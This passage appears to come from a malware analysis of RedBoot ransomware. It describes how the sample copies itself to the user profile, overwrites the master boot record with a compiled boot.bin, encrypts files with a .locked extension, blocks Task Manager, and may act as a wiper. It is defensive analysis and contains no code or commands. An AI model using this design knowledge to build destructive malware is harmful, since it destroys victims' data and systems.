    • %Userprofile%[Random Numbers]protect.exe

      • Terminate process analyze programs such as task manager from running

Once the computer is compromised, the Malware copies its own executable file to %Userprofile% folder and compiles boot.bin.

The Malware deletes the boot.asm and assembly.exe files from the computer.

The Malware uses the overwrite.exe program to overwrite the computer’s MBR with the compiled boot.bin using following commands:

While Malware.exe is encrypting files, it will encrypt all files and append the .locked extension onto each encrypted file’s filename.

After Malware encrypts all personal documents and restarts the computer the new MBR simply boots to a red screen containing a message reporting that the computer has been encrypted and to contact its developer for unlock instructions.

After our analysis we have notice that the Malware doesn’t provide a way to input a key to restore the MBR and partition table, It is currently unclear whether RedBoot is yet another wiper masquerading as ransomware, just as NotPetya, or if it is just poorly coded malware.